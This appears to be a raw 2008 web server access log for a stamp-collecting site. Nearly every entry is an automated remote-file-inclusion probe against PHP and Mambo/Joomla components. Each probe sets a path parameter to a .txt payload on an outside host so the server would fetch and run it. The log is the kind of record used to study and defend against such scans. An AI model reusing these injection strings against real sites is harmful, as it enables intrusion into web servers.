89.108.64.208 - - [03/Aug/2008:17:00:20 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
89.108.64.208 - - [03/Aug/2008:17:00:21 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
89.108.64.208 - - [03/Aug/2008:17:00:21 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
89.111.179.12 - - [03/Aug/2008:17:00:22 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.179.12 - - [03/Aug/2008:17:00:22 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.179.12 - - [03/Aug/2008:17:00:23 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.106 - - [03/Aug/2008:17:00:29 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.106 - - [03/Aug/2008:17:00:29 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.176.106 - - [03/Aug/2008:17:00:30 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.91.231.131 - - [03/Aug/2008:17:00:54 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.91.231.131 - - [03/Aug/2008:17:00:54 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.91.231.131 - - [03/Aug/2008:17:00:54 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
221.144.12.141 - - [03/Aug/2008:17:01:39 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.144.12.141 - - [03/Aug/2008:17:01:39 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.144.12.141 - - [03/Aug/2008:17:01:39 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.144.12.141 - - [03/Aug/2008:17:01:39 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.144.12.141 - - [03/Aug/2008:17:01:40 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.144.12.141 - - [03/Aug/2008:17:01:40 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.144.12.141 - - [03/Aug/2008:17:01:48 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:17:02:55 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:17:03:02 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
69.94.30.30 - - [03/Aug/2008:17:03:17 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.mathstamps.com"
69.94.30.30 - - [03/Aug/2008:17:03:17 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.mathstamps.com"
216.139.67.20 - - [03/Aug/2008:17:03:22 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
216.139.67.20 - - [03/Aug/2008:17:03:23 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
125.175.78.175 - - [03/Aug/2008:17:03:47 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.mathstamps.com"
65.111.37.210 - - [03/Aug/2008:17:03:49 -0700] "GET //?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.mathstamps.com"
125.175.78.175 - - [03/Aug/2008:17:03:50 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.mathstamps.com"
76.74.137.190 - - [03/Aug/2008:17:04:00 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
218.219.147.58 - - [03/Aug/2008:17:04:05 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.mathstamps.com"
218.219.147.58 - - [03/Aug/2008:17:04:05 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.mathstamps.com"
195.209.236.71 - - [03/Aug/2008:17:04:27 -0700] "GET /index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.mathstamps.com"
195.209.236.71 - - [03/Aug/2008:17:04:27 -0700] "GET /logs/index.php?redir=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.mathstamps.com"
89.111.176.106 - - [03/Aug/2008:17:05:57 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
89.111.179.12 - - [03/Aug/2008:17:07:11 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
88.27.112.153 - - [03/Aug/2008:17:07:11 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
88.27.112.153 - - [03/Aug/2008:17:07:13 -0700] "GET /logs/access_080421.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
88.27.112.153 - - [03/Aug/2008:17:07:18 -0700] "GET /logs/access_080630.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
89.108.64.208 - - [03/Aug/2008:17:07:19 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.6.22.92 - - [03/Aug/2008:17:07:21 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
88.27.112.153 - - [03/Aug/2008:17:07:24 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.energobalt-spb.ru/error_log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
64.91.231.131 - - [03/Aug/2008:17:09:19 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
65.111.37.210 - - [03/Aug/2008:17:10:35 -0700] "GET /logs/access_080505.log//?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
65.111.37.210 - - [03/Aug/2008:17:10:35 -0700] "GET /logs//?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 200 4947 "-" "libwww-perl/5.805" "www.mathstamps.com"
65.111.37.210 - - [03/Aug/2008:17:10:36 -0700] "GET /logs/access_080519.log//?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/fvck/cek25.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.22.89.194 - - [03/Aug/2008:17:11:09 -0700] "GET /logs/access_080512.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.22.89.194 - - [03/Aug/2008:17:11:09 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.22.89.194 - - [03/Aug/2008:17:11:09 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.22.89.194 - - [03/Aug/2008:17:11:21 -0700] "GET /logs/access_080505.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.22.89.194 - - [03/Aug/2008:17:11:34 -0700] "GET /logs/access_080707.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.22.89.194 - - [03/Aug/2008:17:11:34 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.22.89.194 - - [03/Aug/2008:17:11:34 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
64.22.89.194 - - [03/Aug/2008:17:11:46 -0700] "GET /logs/access_080616.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
212.227.118.35 - - [03/Aug/2008:17:12:45 -0700] "GET /logs/access_080616.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.118.35 - - [03/Aug/2008:17:12:46 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.118.35 - - [03/Aug/2008:17:12:46 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
212.227.118.35 - - [03/Aug/2008:17:12:46 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
67.19.204.226 - - [03/Aug/2008:17:16:54 -0700] "GET /logs/access_080707.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.19.204.226 - - [03/Aug/2008:17:16:54 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.19.204.226 - - [03/Aug/2008:17:16:55 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.19.204.226 - - [03/Aug/2008:17:18:53 -0700] "GET /logs/access_080616.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
221.144.12.141 - - [03/Aug/2008:17:19:21 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
221.144.12.141 - - [03/Aug/2008:17:19:35 -0700] "GET /logs/access_080630.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.19.204.226 - - [03/Aug/2008:17:20:35 -0700] "GET /logs//include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.19.204.226 - - [03/Aug/2008:17:20:35 -0700] "GET //include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.19.204.226 - - [03/Aug/2008:17:20:36 -0700] "GET /logs/access_080421.log//include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.19.204.226 - - [03/Aug/2008:17:20:39 -0700] "GET /logs/access_080526.log//include/functions_common.php?gl_root_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:17:21:55 -0700] "GET /logs/access_080526.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:17:21:55 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:17:21:56 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.19.204.226 - - [03/Aug/2008:17:33:33 -0700] "GET /lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.19.204.226 - - [03/Aug/2008:17:33:33 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.19.204.226 - - [03/Aug/2008:17:33:33 -0700] "GET /logs/access_080630.log/lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
67.19.204.226 - - [03/Aug/2008:17:34:15 -0700] "GET /logs/access_080707.log/lostpasswd.php?env[include_prefix]=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
65.98.89.43 - - [03/Aug/2008:17:34:50 -0700] "GET /logs/access_080609.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
58.65.228.5 - - [03/Aug/2008:17:48:44 -0700] "GET /?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.246.78.8 - - [03/Aug/2008:17:56:07 -0700] "GET ///vwar/backup/errors.php?error=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
216.246.78.8 - - [03/Aug/2008:17:56:08 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.mathstamps.com"
76.74.137.190 - - [03/Aug/2008:17:56:21 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
76.74.137.190 - - [03/Aug/2008:17:56:22 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.mathstamps.com"
218.219.147.58 - - [03/Aug/2008:17:59:37 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.mathstamps.com"
218.219.147.58 - - [03/Aug/2008:17:59:37 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.mathstamps.com"
125.175.78.175 - - [03/Aug/2008:18:00:38 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.mathstamps.com"
125.175.78.175 - - [03/Aug/2008:18:00:39 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.mathstamps.com"
216.139.67.20 - - [03/Aug/2008:18:01:36 -0700] "GET /logs/gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
216.139.67.20 - - [03/Aug/2008:18:01:36 -0700] "GET /gallery.php?phpbb_root_path=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:18:08:02 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:18:08:02 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:18:08:02 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:18:08:03 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:18:08:03 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:18:08:03 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:18:08:04 -0700] "GET /logs/access_080630.log//include/bbs.lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:18:08:04 -0700] "GET //include/bbs.lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:18:08:04 -0700] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.135.59.180 - - [03/Aug/2008:18:08:09 -0700] "GET /logs/access_080707.log//include/bbs.lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:18:08:10 -0700] "GET /logs/access_080707.log//include/bbs.lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.200.78.44 - - [03/Aug/2008:18:08:15 -0700] "GET /logs/access_080707.log//include/bbs.lib.inc.php?site_path=http://www.ukspoznan.ovh.org/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
67.15.8.80 - - [03/Aug/2008:18:09:17 -0700] "GET /logs/access_080707.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.8.80 - - [03/Aug/2008:18:09:34 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.8.80 - - [03/Aug/2008:18:09:34 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
67.15.186.5 - - [03/Aug/2008:18:18:02 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
67.15.186.5 - - [03/Aug/2008:18:18:02 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.pousadapedradaconcha.com.br/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.mathstamps.com"
82.146.39.200 - - [03/Aug/2008:18:20:49 -0700] "GET /logs/access_080526.log//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.146.39.200 - - [03/Aug/2008:18:20:50 -0700] "GET //com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
82.146.39.200 - - [03/Aug/2008:18:20:50 -0700] "GET /logs//com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.185.237.77 - - [03/Aug/2008:18:24:57 -0700] "GET /logs/access_080616.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.185.237.77 - - [03/Aug/2008:18:25:03 -0700] "GET /logs//components/com_lmo/lmo.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
64.185.237.77 - - [03/Aug/2008:18:27:14 -0700] "GET /logs/access_080602.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
